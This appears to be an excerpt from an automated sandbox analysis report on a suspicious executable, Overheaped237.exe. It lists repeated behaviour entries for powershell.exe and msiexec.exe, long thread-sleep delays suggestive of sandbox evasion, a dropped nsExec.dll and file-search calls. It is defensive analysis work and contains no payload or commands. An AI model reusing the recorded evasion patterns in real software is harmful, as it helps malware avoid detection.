Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598435	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597385	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6214			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3380			Jump to behavior

Source: C:\Users\user\Desktop\Overheaped237.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2384	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5820	Thread sleep count: 8762 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5820	Thread sleep count: 1090 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -598435s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -597385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484	Thread sleep time: -594469s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Overheaped237.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\Overheaped237.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\Overheaped237.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598435	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597385	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596375	Jump to behavior
